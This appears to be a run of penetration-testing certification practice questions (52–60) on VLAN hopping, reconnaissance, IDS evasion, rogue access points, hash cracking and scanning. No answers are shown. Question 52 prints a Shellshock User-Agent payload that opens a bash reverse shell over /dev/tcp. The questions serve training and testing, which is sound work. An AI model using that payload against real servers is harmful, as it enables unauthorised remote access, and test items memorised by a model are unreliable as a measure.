A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging. Which of the following techniques would BEST accomplish this goal?
Question 52
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Question 53
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
Question 54
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
Question 55
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
Question 56
SIMULATION -You are a penetration tester running port scans on a server. INSTRUCTIONS -Part 1: Given the output, construct the command that was used to generate this output from the available options. Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Part 1 -Part 2 -
Question 57
Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report?
Question 58
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
Question 59
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
Question 60
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?